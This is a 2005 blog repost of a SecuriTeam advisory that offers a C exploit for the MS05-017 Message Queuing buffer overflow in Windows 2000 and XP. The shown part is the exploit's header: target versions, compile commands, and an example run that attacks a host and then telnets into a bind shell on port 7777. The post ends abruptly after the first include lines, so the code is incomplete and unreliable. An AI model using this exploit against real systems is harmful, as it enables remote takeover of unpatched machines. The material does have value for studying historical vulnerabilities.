Search This Blog

Thursday, June 30, 2005

[EXPL] Vulnerability in Message Queuing Allows Code Execution (MS05-017, Exploit 2)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Vulnerability in Message Queuing Allows Code Execution (MS05-017, Exploit
2)
------------------------------------------------------------------------

SUMMARY

As we recently reported (
<http://www.securiteam.com/windowsntfocus/5BP0B0UFGY.html> Vulnerability
in Message Queuing Allows Code Execution (MS05-017)), a vulnerability in
Microsoft's Message Queuing allows remote attackers to overflow an
internal buffer and cause the execution of arbitrary code. The following
exploit can be used to test your system for the mentioned vulnerability.

DETAILS

Exploit:
/* HOD-ms05017-msmq-expl.c: 2005-05-16: PUBLIC v.0.2
*
* Copyright (c) 2004-2005 houseofdabus.
*
* (MS05-017) Message Queuing Buffer Overflow Vulnerability
* Universal Exploit
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* [ <http://www.livejournal.com/users/houseofdabus>
http://www.livejournal.com/users/houseofdabus
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows XP SP1
* - Windows 2000 SP4
* - Windows 2000 SP3
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in Message Queuing
* that could allow an attacker who successfully exploited this
* vulnerability to take complete control of the affected system.
*
* ---------------------------------------------------------------------
* Solution:
* <http://www.microsoft.com/technet/security/Bulletin/MS05-017.mspx>
http://www.microsoft.com/technet/security/Bulletin/MS05-017.mspx
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows XP SP1
* - Windows XP SP0
* - Windows 2000 PRO SP4
* - Windows 2000 PRO SP3
* - Windows 2000 Server SP4
* - Windows 2000 AdvServer SP4
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05017-msmq-expl HOD-ms05017-msmq-expl.c
* Win32/cygwin: gcc -o HOD-ms05017-msmq-expl HOD-ms05017-msmq-expl.c
* Linux : gcc -o HOD-ms05017-msmq-expl HOD-ms05017-msmq-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms05017-msmq-expl 192.168.0.1 2103 HOD 7777
*
* [*] Connecting to 192.168.0.22:2103 ... OK
* [*] Attacking...OK
*
* C:\>telnet 192.168.0.1 7777
*
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>net stop msmq
*
* The Message Queuing service was stopped successfully.
*
* C:\WINNT\system32>net start msmq
* The Message Queuing service is starting..
* The Message Queuing service was started successfully.
*
* C:\WINNT\system32>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
*/

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#pragma pack(1)
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

No comments: